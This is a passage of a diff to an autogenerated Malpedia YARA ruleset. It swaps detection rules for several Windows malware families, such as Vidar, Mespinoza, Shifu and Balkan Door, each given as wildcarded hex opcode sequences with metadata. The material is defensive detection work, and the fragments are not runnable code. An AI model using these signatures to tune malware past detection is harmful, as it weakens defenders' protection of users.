-		$sequence_7 = { 03442410 4403e8 428b4405e7 418bd5 }
-		$sequence_8 = { 03c1 03d0 488d051e580500 418b0400 }
-		$sequence_9 = { 6bc903 898180434b00 68???????? 8b55fc 52 }
-		$sequence_10 = { 02c8 41880c18 418a03 240f }
-		$sequence_11 = { 8945d8 837dd806 0f8797000000 8b4dd8 ff248d54e94600 8b55f8 }
-		$sequence_12 = { 83fa78 7f19 0fbe85f3fdffff 0fbe8800ec4900 83e10f 898d28fdffff eb0a }
-		$sequence_13 = { 8945f0 817df005010000 7302 eb05 e8???????? 8b4df0 c681f82c4b0000 }
-		$sequence_14 = { 03c0 2bc8 0f84ec040000 8d41ff 8b848288d20600 }
-		$sequence_15 = { 0344240c 4403d0 488d051a560500 418b0400 }
+		$sequence_0 = { 83c408 8b5004 52 8b00 50 8d4dd8 e8???????? }
+		$sequence_1 = { e8???????? c745fcffffffff 8d4d08 e8???????? 8a45eb }
+		$sequence_2 = { eb24 33c9 894ddc 8d4ddc e8???????? 8945e0 }
+		$sequence_3 = { 05c8000000 8bc8 e8???????? 6a10 e8???????? 83c404 8945ec }
+		$sequence_4 = { 8d45ec 50 8b4d08 e8???????? 8b4de8 }
+		$sequence_5 = { ff15???????? 85c0 7575 8b45c0 }
+		$sequence_6 = { 8b4dfc 8b11 8b4dfc 8b4210 ffd0 8be5 5d }
+		$sequence_7 = { 83ec0c 894dfc 8b45fc 50 8b4d08 51 e8???????? }
+		$sequence_8 = { e8???????? 50 8b4dd0 e8???????? 50 }
+		$sequence_9 = { e8???????? 8b4df0 e8???????? c745fcffffffff 8d4d08 e8???????? }
 
 	condition:
-		7 of them and filesize < 1556480
+		7 of them and filesize < 1433600
 }
-rule MALPEDIA_Win_Vidar_Auto : FILE
+rule MALPEDIA_Win_Mespinoza_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a2b64f61-0adb-5b11-ad23-70455bcfca7c"
+		id = "64606785-caad-5456-be9c-a6b69cbeed8d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.vidar_auto.yar#L1-L603"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mespinoza"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mespinoza_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "33908c4a5b34fe0467be14ef9b31f306540934b8f5c348e181dd6ed65da6d436"
+		logic_hash = "8fedbfda9801fec8b36b08d0047fda05662354c890294b93f8c3d358064016b8"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -108911,95 +109182,34 @@ rule MALPEDIA_Win_Vidar_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 25ff7f0000 c3 e8???????? 8b486c }
-		$sequence_1 = { 7202 8b00 8d8d68fdffff 51 50 }
-		$sequence_2 = { 8b8648af0100 c1e803 038644af0100 5e 5d c3 }
-		$sequence_3 = { 56 8b742408 8b865caf0100 57 }
-		$sequence_4 = { 8b7508 33ff 89b55cfdffff 89bd60fdffff 8d450c }
-		$sequence_5 = { e8???????? d9450c 51 8d8d58ffffff d91c24 }
-		$sequence_6 = { 8b7508 33db 895dd0 c746140f000000 895e10 8975cc }
-		$sequence_7 = { d9e0 d99d00ffffff d98500ffffff d91c24 }
-		$sequence_8 = { 740a b800000500 e9???????? 57 }
-		$sequence_9 = { 5f c6043300 8bc6 5e 5b c20400 }
-		$sequence_10 = { 895dfc e8???????? 83781408 c645fc01 }
-		$sequence_11 = { b800020000 e9???????? 8b4dc8 33c0 }
-		$sequence_12 = { 5e c20400 ff742408 e8???????? 59 83f8ff }
-		$sequence_13 = { c745f41e000000 c745f80f000000 8955fc 8bcb }
-		$sequence_14 = { e8???????? 56 53 8d4d80 e8???????? }
-		$sequence_15 = { ff15???????? 89460c 3bc3 7507 }
-		$sequence_16 = { f3a5 8d88e00e0000 894de4 8bcb }
-		$sequence_17 = { e8???????? 59 83f8ff 7503 32c0 c3 }
-		$sequence_18 = { 83781410 7202 8b00 50 8b45a0 }
-		$sequence_19 = { c1e004 8bf0 0fbe4301 50 }
-		$sequence_20 = { c9 c3 8b542408 85d2 7503 33c0 c3 }
-		$sequence_21 = { 53 68???????? 6802000080 ff15???????? 85c0 751b }
-		$sequence_22 = { 50 ff15???????? 8b4da0 8901 85c0 }
-		$sequence_23 = { 50 6a09 53 68???????? }
-		$sequence_24 = { 0fb605???????? 50 0fb605???????? 50 0fb605???????? 50 6a01 }
-		$sequence_25 = { 68???????? e8???????? 59 83f820 }
-		$sequence_26 = { 395df0 7411 ff75f0 53 }
-		$sequence_27 = { 53 50 899e6caf0600 e8???????? }
-		$sequence_28 = { 53 68???????? 8d8da8000000 e8???????? }
-		$sequence_29 = { 895df0 8d45f0 50 6a09 }
-		$sequence_30 = { 399e70af0600 7514 c78678af060001000000 c78670af060000000100 68fcff0100 8d8670af0400 53 }
-		$sequence_31 = { 7411 395df0 740c ff75f0 ff15???????? 895df0 }
-		$sequence_32 = { 741d ff75f0 ff15???????? 895df0 395df0 740c ff75f0 }
-		$sequence_33 = { c3 55 8bec 83ec0c 8365fc00 8365f400 8365f800 }
-		$sequence_34 = { 8d852cffffff 50 8d459c 50 }
-		$sequence_35 = { 0faf450c 50 e8???????? 59 }
-		$sequence_36 = { 8b4508 8906 8b450c 894608 8b4510 }
-		$sequence_37 = { e8???????? c9 c3 55 8bec 83ec18 8b450c }
-		$sequence_38 = { 8910 8b4120 8910 8b4130 8910 c3 56 }
-		$sequence_39 = { 50 ff15???????? 6a1a e8???????? }
-		$sequence_40 = { 6860ea0000 6a00 ff15???????? 50 }
-		$sequence_41 = { 5f c21000 8bff 55 8bec 6a0a }
-		$sequence_42 = { 5b 5d c3 b84d5a0000 }
-		$sequence_43 = { 83f8ff 740c a810 7508 }
-		$sequence_44 = { eb0b 8b45f4 0500040000 8945f4 }
-		$sequence_45 = { dd1c24 6a0b 6a10 e8???????? 83c41c 8be5 }
-		$sequence_46 = { 4c8bc7 33d2 488bc8 ff15???????? e8???????? }
-		$sequence_47 = { dd45f0 dd1c24 83ec08 dd4508 dd1c24 6a0b 6a10 }
-		$sequence_48 = { 492bc1 483d40420f00 0f87f0000000 458bc7 }
-		$sequence_49 = { 2bd3 03ca 4103cb 0f84de010000 4863442440 33d2 440fb6743001 }
-		$sequence_50 = { 83bc24a400000000 b8ea22c8aa b9a5a0bab6 0f44c1 }
-		$sequence_51 = { f30fe6c9 f20f58c0 f20f5cc8 f20f59ce f20f114c2458 0fbe05???????? 0fbe0d???????? }
-		$sequence_52 = { 83bc249400000000 b9ed1334e4 b8302e84ed 0f4fc8 e9???????? 8b8c248c000000 }
-		$sequence_53 = { 8bd7 8bc5 83ee04 7211 8b0a }
-		$sequence_54 = { 83bc249c00000000 bf9def53cd b8a3d8a22f 0f4ff8 }
-		$sequence_55 = { 83bc24a004000000 b9e2dadbde 0f8408ffffff b95fc85b65 }
-		$sequence_56 = { 492bc3 493bc2 7708 41ffc0 }
-		$sequence_57 = { 2bc1 f2480f2ac0 f20f59442458 f20f2cc0 894590 4863442440 }
-		$sequence_58 = { 492bc2 483bc1 770c 41ffc1 }
-		$sequence_59 = { 83bc24a007000000 b8c00c462f b92fb31014 0f44c8 }
-		$sequence_60 = { 8bd8 33da 80f101 898c2484000000 }
-		$sequence_61 = { 8bd8 23d1 8b149518d54600 c1eb08 }
-		$sequence_62 = { 0f57c0 f2480f2ac2 33d2 f20f59c8 f20f114c2450 0fbe05???????? }
-		$sequence_63 = { 492bd1 4e8d0436 6666660f1f840000000000 410fb60408 }
-		$sequence_64 = { 0fbe0d???????? 3bc1 7429 0fbe0d???????? 0fafcf 8d0449 }
-		$sequence_65 = { 0fbec8 0f57d2 0fbe05???????? 8d14d1 0fbe0d???????? 03c2 }
-		$sequence_66 = { 4923c2 493bc3 7742 488bc2 4923c2 493bc3 }
-		$sequence_67 = { 83bc249400000003 0f9c442460 8b05???????? 8d4801 }
-		$sequence_68 = { 0f8c0d230000 488b7c2440 8b742450 488d0d1c700200 e8???????? 488d8d10030000 ff15???????? }
-		$sequence_69 = { 83bc24980000000e 0f9c442464 8b05???????? 8d4801 }
-		$sequence_70 = { 83bc24980000000f b9fe4381ca b800af166b 0f4cc8 }
+		$sequence_0 = { 6a02 6a00 68???????? 6802000080 ff15???????? 8b15???????? }
+		$sequence_1 = { 894de4 399860554700 0f84ea000000 41 83c030 894de4 3df0000000 }
+		$sequence_2 = { 6a00 ff5014 c20800 55 8bec 83c1f8 }
+		$sequence_3 = { 40 8945d4 8bd8 0f1f00 ff75e0 8b17 }
+		$sequence_4 = { e8???????? 8d8d98efffff e8???????? 8b4df4 }
+		$sequence_5 = { 897de4 33db 895dfc 895dd4 81fb80000000 7d4d 8b049d00b04700 }
+		$sequence_6 = { 3347fc 0be8 83ea01 75f0 8b5c2420 896c2410 eb08 }
+		$sequence_7 = { c6430900 83630c00 c703???????? 8a00 884310 eb02 33db }
+		$sequence_8 = { 0f57c0 c745fc00000000 660fd64604 6aff 8d4e10 c706???????? c7460c04000000 }
+		$sequence_9 = { e8???????? 8bd8 33c9 8bc6 895dc8 f7e7 }
 
 	condition:
-		7 of them and filesize < 4751360
+		7 of them and filesize < 1091584
 }
-rule MALPEDIA_Win_Shifu_Auto : FILE
+rule MALPEDIA_Win_Spedear_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "94131f96-f004-59ab-be06-e4302b4af25a"
+		id = "1d005a15-ef8d-569f-a767-c6e1e72829d4"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shifu"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.shifu_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spedear"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.spedear_auto.yar#L1-L271"
 		license_url = "N/A"
-		logic_hash = "c03c0d8c15de6f3e31605e542d8b0452407c2c6c3eb4ca0055ffada2d5d050db"
+		logic_hash = "fdde63af58dfc9054af7189054546d8fc5a45deaed146cfe4323b2ae3cb67aa8"
 		score = 75
-		quality = 75
+		quality = 71
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -109011,32 +109221,50 @@ rule MALPEDIA_Win_Shifu_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 895dfc 6a08 58 e8???????? 8bc4 85c0 7411 }
-		$sequence_1 = { 56 e8???????? 85c0 0f848d010000 ff7508 683a041000 e8???????? }
-		$sequence_2 = { 83c420 f644242010 741c 6a04 6a00 ff742418 e8???????? }
-		$sequence_3 = { 83c604 833e00 75a3 83c714 8b470c 85c0 0f8573ffffff }
-		$sequence_4 = { 6800200000 57 57 6a02 ff15???????? 8bd8 3bdf }
-		$sequence_5 = { 7516 6aff 53 ff15???????? 83f8ff 7408 53 }
-		$sequence_6 = { 85c0 7540 3945f4 7447 ff15???????? 8b75f8 8365f400 }
-		$sequence_7 = { 50 68060000c8 56 c7442430b907a225 c744243660468ee9 c744243a76e58c74 66c744243e063e }
-		$sequence_8 = { 50 ff15???????? 6a10 58 e8???????? 8bc4 3bc7 }
-		$sequence_9 = { e8???????? 50 ffd6 893d???????? 3bc7 740a c705????????01000000 }
+		$sequence_0 = { 83e207 03c2 c1f803 83c40c 85c0 }
+		$sequence_1 = { 53 50 e8???????? 8b7e0c 895e10 }
+		$sequence_2 = { 8b4718 8a5f06 50 894608 e8???????? }
+		$sequence_3 = { 6a00 6a00 57 8bd8 ffd6 6a00 8d442414 }
+		$sequence_4 = { 894618 ffd7 89461c 5f }
+		$sequence_5 = { e8???????? 83c404 3bc5 740a c700???????? 8bd8 eb02 }
+		$sequence_6 = { 8906 8b44241c 5e 33d1 5d }
+		$sequence_7 = { 8b4604 8b571c 83c410 83c120 53 e8???????? 3bdd }
+		$sequence_8 = { 85c0 7536 85f6 742c 833e00 741e 8b5608 }
+		$sequence_9 = { 6a00 68???????? e8???????? 83c40c 68d0070000 }
+		$sequence_10 = { 741a 6a00 6a00 ff7608 ff5604 6800800000 6a00 }
+		$sequence_11 = { 394878 7456 39487c 7451 }
+		$sequence_12 = { 8bc7 5e 5f 5b 5d c3 6a08 }
+		$sequence_13 = { 83450c04 33c7 ff4d08 8b7dfc }
+		$sequence_14 = { c745fc12000000 33ff 895d08 8b5d0c 0fb61c19 c1e708 }
+		$sequence_15 = { 4c8bda 418b10 498d6b44 498bd9 498bf8 }
+		$sequence_16 = { 8b4610 3998a0000000 760f 3998a4000000 7607 57 56 }
+		$sequence_17 = { 3b0d???????? 7329 4863d1 488d0dd0ab0000 }
+		$sequence_18 = { ff15???????? 4c8d5c2440 488d1571020100 492bd3 410fb60b 410fb60413 }
+		$sequence_19 = { c744243004010000 e8???????? 488b4c2438 4c8d5c2430 488d842450010000 488d15f0bd0000 4c895c2428 }
+		$sequence_20 = { 8d6a12 41be04000000 4d2be3 0f1f00 448bc2 }
+		$sequence_21 = { 68???????? 8d45f0 50 c745f0f0d12300 e8???????? }
+		$sequence_22 = { 488bcb e8???????? 85ff 7e33 }
+		$sequence_23 = { 8b4310 33c9 56 57 394878 }
+		$sequence_24 = { 895f10 488b4f18 4885c9 740c e8???????? }
+		$sequence_25 = { 3bf2 7cc1 034004 8b4804 }
+		$sequence_26 = { 4883c308 483bdf 72ed 48833d????????00 741f 488d0dc6ef0000 e8???????? }
+		$sequence_27 = { 85c0 752c ff7508 68???????? }
 
 	condition:
-		7 of them and filesize < 344064
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Hotwax_Auto : FILE
+rule MALPEDIA_Win_Unidentified_099_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8f2ed895-b1d8-5520-8ccc-967359fd3764"
+		id = "6834d9d3-6a75-5c68-b5d3-9237e184ef6d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hotwax"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hotwax_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_099"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_099_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "d7cd386e473b27344ee89ce7aa7064b521c3dfeec69fed7db0108e253da6990c"
+		logic_hash = "7fd05f1e717b782bb9ac06a7756c0dc03e1b36f5a16d932168b1c5d5cda9cc3a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -109050,71 +109278,71 @@ rule MALPEDIA_Win_Hotwax_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 807d580a 4c8d05737dffff 740f eb07 4c8d05687dffff 448823 48ffc3 }
-		$sequence_1 = { 488d542448 488d8c2400020000 e8???????? 488b5c2448 85c0 740b ff15???????? }
-		$sequence_2 = { 4889842410030000 488bf9 488d8c2401020000 33d2 41b803010000 c684240002000000 }
-		$sequence_3 = { 488d15edd30000 488bcb 488905???????? ff15???????? 488d15bed30000 }
-		$sequence_4 = { 4533db 488d9424f0000000 41b803010000 44895c2440 4c895c2448 ff15???????? 833d????????00 }
-		$sequence_5 = { 486bd258 490394c1a04b0100 f6423880 742c }
-		$sequence_6 = { c785080500004c647247 c7850c05000065745072 c785100500006f636564 c7851405000075726541 c7851805000064647265 }
-		$sequence_7 = { 0f84da000000 488b9424b0000000 8bd8 410fb7f6 4803da 488d3c0a 488b0b }
-		$sequence_8 = { 488b0d???????? eb7c 4c8d256a830000 488b0d???????? eb6c e8???????? }
-		$sequence_9 = { 33c0 e9???????? 48895c2408 4c63c1 488d1d45770000 4d8bc8 }
+		$sequence_0 = { 48895c2408 4889742410 57 4883ec20 488d1d7e700100 }
+		$sequence_1 = { 498bcd ff15???????? b974000000 e8???????? 4c8bd0 }
+		$sequence_2 = { 488d05fb9d0000 49c1e302 4889452f 83e202 8bc2 4903c3 4c8945ef }
+		$sequence_3 = { f3aa 488d8520030000 33c9 4533c9 4889442420 4533c0 ff15???????? }
+		$sequence_4 = { 4885c0 0f8421040000 4d8bc5 488d1506950100 488d4c2450 }
+		$sequence_5 = { 7410 488d0d2cb50100 4883c428 e9???????? e8???????? 85c0 }
+		$sequence_6 = { 752c 4985df 7527 488b9540070000 4c8d0502860000 498bcd 44897604 }
+		$sequence_7 = { 41b880000000 e8???????? 4533ed 488d8d50040000 33d2 44896c2468 }
+		$sequence_8 = { 488d8c2490200000 4533c9 48897c2430 897c2428 ba00000080 c744242003000000 }
+		$sequence_9 = { 488d7f01 4883fa2d 7ce7 4c8d8510020000 }
 
 	condition:
-		7 of them and filesize < 198656
+		7 of them and filesize < 314368
 }
-rule MALPEDIA_Win_Unidentified_063_Auto : FILE
+rule MALPEDIA_Win_Tapaoux_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d22cba4e-b95b-5578-ac95-09534bd7dc14"
-		date = "2022-11-21"
-		modified = "2022-11-25"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_063"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_063_auto.yar#L1-L124"
+		id = "92f6e706-3399-5d0e-9b67-afc2a01b11c8"
+		date = "2026-01-05"
+		modified = "2026-01-06"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tapaoux"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tapaoux_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "14c180eecdf0e6fbf2b936d6c444ad58c2e649e1fa770106e8719057ee1aefbd"
+		logic_hash = "d4ad8726a2edee7cde7a56aa56890c668a33f52c080a12cbfff5c16b6a3c4a03"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20221118"
-		malpedia_hash = "e0702e2e6d1d00da65c8a29a4ebacd0a4c59e1af"
-		malpedia_version = "20221125"
+		malpedia_rule_date = "20260105"
+		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
+		malpedia_version = "20251219"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d43cf 83f819 770c 6689b550030000 e9???????? }
-		$sequence_1 = { 7363 488bf3 4c8d35dfc40100 83e63f 488beb 48c1fd06 48c1e606 }
-		$sequence_2 = { e8???????? 4863f8 488d3588800100 488bcb }
-		$sequence_3 = { 0f11442478 4c8b4708 488d442470 493bc0 7362 488b07 488d4c2470 }
-		$sequence_4 = { 4885c9 7407 48ff25???????? c3 48894c2408 57 4883ec50 }
-		$sequence_5 = { 83f801 7518 488b0d???????? 488d05bf5f0100 483bc8 7405 e8???????? }
-		$sequence_6 = { 8b8c96d0cd0200 8b534c 33c8 0fb6c1 }
-		$sequence_7 = { 0f84e7000000 488b0e 483bc8 740e 4885c9 7406 }
-		$sequence_8 = { 498bc2 418be9 48c1f806 488d0d708c0100 4183e23f 4903e8 }
-		$sequence_9 = { 488d158a5a0200 488bcb e8???????? 85c0 7499 488d157f5a0200 488bcb }
+		$sequence_0 = { 57 8d442418 68???????? 50 e8???????? 8b07 }
+		$sequence_1 = { 8b4c243e 81e2ffff0000 25ffff0000 52 8b54243e 50 8b442440 }
+		$sequence_2 = { ff15???????? 8a842410050000 83c410 33db }
+		$sequence_3 = { 5b 81c408040000 c3 8b84241c040000 8b4b04 }
+		$sequence_4 = { 83c40c 85c0 56 7d16 }
+		$sequence_5 = { 8d442410 50 e8???????? 8b8c2428010000 83c404 }
+		$sequence_6 = { 8b44241c 8d542410 52 8d8c24d8060000 50 51 57 }
+		$sequence_7 = { 83c410 85c0 7507 b850000000 eb09 50 e8???????? }
+		$sequence_8 = { 8be8 0fbe03 50 e8???????? 83c408 3bc5 }
+		$sequence_9 = { 84c0 74c5 3bf7 7ccf 5f 5e 5d }
 
 	condition:
-		7 of them and filesize < 475136
+		7 of them and filesize < 292864
 }
-rule MALPEDIA_Win_7Ev3N_Auto : FILE
+rule MALPEDIA_Win_Veiledsignal_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "005aa5f2-162b-5bf7-ad49-b9d7ff2db13f"
+		id = "71866fc5-9473-559b-a801-c95ebfec50c7"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.7ev3n"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.7ev3n_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.veiledsignal"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.veiledsignal_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "4eede98c5fa06e7258d260c1c452e6214bfc253858a007d8970063a1ca550ad3"
+		logic_hash = "71af0216ed8c73a7deae45ea9d8e0b2ebb718fbb1957e80a9a771dea9a9d10a4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -109128,32 +109356,32 @@ rule MALPEDIA_Win_7Ev3N_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a00 8d85f0d9ffff 50 8d8dd0cdffff e8???????? 8bce 2bcf }
-		$sequence_1 = { 2bcf 3bc1 0f84e2910000 8dbd50dcffff 8d4f02 0f1f840000000000 }
-		$sequence_2 = { 2bcf 3bc1 0f8412490000 8dbdcce7ffff 8d4f02 0f1f840000000000 668b07 }
-		$sequence_3 = { e8???????? 8bce 2b8d00cbffff 3bc1 0f84ce070000 8dbd50d9ffff 8d4f02 }
-		$sequence_4 = { e8???????? 8bce 2bcf 3bc1 0f84427a0000 8dbdf8eeffff 8d4f02 }
-		$sequence_5 = { 6a00 8d85a0e3ffff 50 8d8dd0cdffff e8???????? 8bce 2bcf }
-		$sequence_6 = { 6a00 6800000080 50 ff15???????? 898520ffffff 85c0 7509 }
-		$sequence_7 = { 83c702 6685c0 75f5 2bf9 d1ff 6a00 8d8500edffff }
-		$sequence_8 = { f30f7e05???????? 660fd68564e6ffff 0fb705???????? 6689856ce6ffff f30f7e05???????? 660fd68558e6ffff 0fb705???????? }
-		$sequence_9 = { d1ff 6a00 8d85acfbffff 50 8d8dd0cdffff e8???????? 8bce }
+		$sequence_0 = { c5f92f25???????? 0f82b1000000 48c1e82c c5e9eb15???????? c5f1eb0d???????? 4c8d0d66850000 }
+		$sequence_1 = { e9???????? e8???????? e9???????? 488d0514380400 }
+		$sequence_2 = { 0fb6552f 4c8d4d2f 4533c0 418d4814 ffd0 }
+		$sequence_3 = { 488d0db99a0400 e8???????? 488d0dc59a0400 e8???????? }
+		$sequence_4 = { 7ec4 83c8ff eb0b 4803f6 418b84f7a8140100 85c0 }
+		$sequence_5 = { e8???????? 4881c458010000 c3 8d8146b8ffff 83f801 }
+		$sequence_6 = { e8???????? 488b8890000000 48399938010000 7516 488d05c7390400 4a8b04e8 }
+		$sequence_7 = { ff15???????? e9???????? 8b7c2428 488bcb ff15???????? 85ff 0f844bffffff }
+		$sequence_8 = { 83f8ff 7425 488d1586b10400 8bc8 e8???????? 85c0 740e }
+		$sequence_9 = { 428844f13e 4b8b84e010e70400 42804cf03d04 38558f e9???????? ff15???????? 894597 }
 
 	condition:
-		7 of them and filesize < 803840
+		7 of them and filesize < 667648
 }
-rule MALPEDIA_Win_Moonwalk_Auto : FILE
+rule MALPEDIA_Win_Powerpool_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ef8baf81-8fc1-5b8a-8169-40c37ce56608"
+		id = "d4f7d376-91ac-5fba-b394-2196d4883657"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moonwalk"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.moonwalk_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerpool"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.powerpool_auto.yar#L1-L156"
 		license_url = "N/A"
-		logic_hash = "41695c23cda2f92c0bf6c3a4d26b3fdee7d01afc1ec5f837be35f51c67bf067d"
+		logic_hash = "dfb0ae2ebf3333eb0ea72de9c6611cca01721c6596963f45a9f1a6121b1e8024"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -109167,32 +109395,38 @@ rule MALPEDIA_Win_Moonwalk_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488d4c2458 4c8978d0 4533ff 4c897c2458 44897d20 e8???????? 85c0 }
-		$sequence_1 = { 488b0d???????? ba833fd2f8 41b8e8c5ba5b 48898140010000 488d0d17880000 e8???????? }
-		$sequence_2 = { 488b05???????? 4c8bb42418050000 4885c0 753c 488d8548040000 4489bd48040000 33d2 }
-		$sequence_3 = { 72ed 443bc2 0f844e020000 33c0 44899500020000 89456c 0f57c0 }
-		$sequence_4 = { 4881c4b0000000 5e c3 488b4718 488b4f20 ff5068 488d942490000000 }
-		$sequence_5 = { 488b4968 4c896c2438 4c896c2430 4c896c2428 4c896c2420 e8???????? 4885db }
-		$sequence_6 = { 488d0508ecffff 48894360 488d05bdf4ffff 48894368 488d05b2f5ffff 48894370 488d05c7f7ffff }
-		$sequence_7 = { 488bfa 440fb65104 440fb64908 440fb6410c }
-		$sequence_8 = { 4154 4155 4156 4157 488dac2458feffff 4881ecb8020000 0f1005???????? }
-		$sequence_9 = { 0f84b6000000 4183f81d 740a b810000000 4883c448 c3 48895c2440 }
+		$sequence_0 = { 7412 8b04b0 50 e8???????? }
+		$sequence_1 = { 7412 837de810 8b45d4 895de4 }
+		$sequence_2 = { 895e64 33db 894e68 53 53 56 }
+		$sequence_3 = { 7412 8b4904 80e103 80f901 }
+		$sequence_4 = { 006711 40 0000 0303 }
+		$sequence_5 = { 7412 6a00 e8???????? 84c0 7407 b802000000 5f }
+		$sequence_6 = { 7412 83e903 0f8515010000 c745dcfcae4400 }
+		$sequence_7 = { 895e64 ff15???????? 8b4c2418 51 }
+		$sequence_8 = { 7412 8b45d0 2403 3c01 }
+		$sequence_9 = { 895e64 e9???????? 53 57 }
+		$sequence_10 = { 8b6c2468 55 6a02 33db 33ff ff15???????? 8bf0 }
+		$sequence_11 = { 7443 8b45d4 83ff10 7303 }
+		$sequence_12 = { 005311 40 005d11 40 006711 }
+		$sequence_13 = { 8965f0 85c9 7504 33ff eb16 }
+		$sequence_14 = { 895e64 ff15???????? 8b442414 50 }
+		$sequence_15 = { 7412 8b45a4 83c01f 3945b0 }
 
 	condition:
-		7 of them and filesize < 179200
+		7 of them and filesize < 819200
 }
-rule MALPEDIA_Win_8T_Dropper_Auto : FILE
+rule MALPEDIA_Win_Balkan_Door_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "35feb768-d2e4-5049-96a0-91c968df3b4f"
+		id = "da1553c8-1e46-5d28-bd8e-ffaf0075dca2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.8t_dropper"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.8t_dropper_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.balkan_door"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.balkan_door_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "feebe835113f0d32e29c6ca8b7fd1bfa62958e168ff440bb0def00a1fd456e8d"
+		logic_hash = "8fad6b0583675ac5acd98c6d6d2bed42312dfeea01b9aec6dd08e0296e917b26"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -109206,34 +109440,34 @@ rule MALPEDIA_Win_8T_Dropper_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c644240c00 f3ab 66ab aa bf???????? 83c9ff }
-		$sequence_1 = { 8d4c2408 51 683f000f00 50 52 6801000080 }
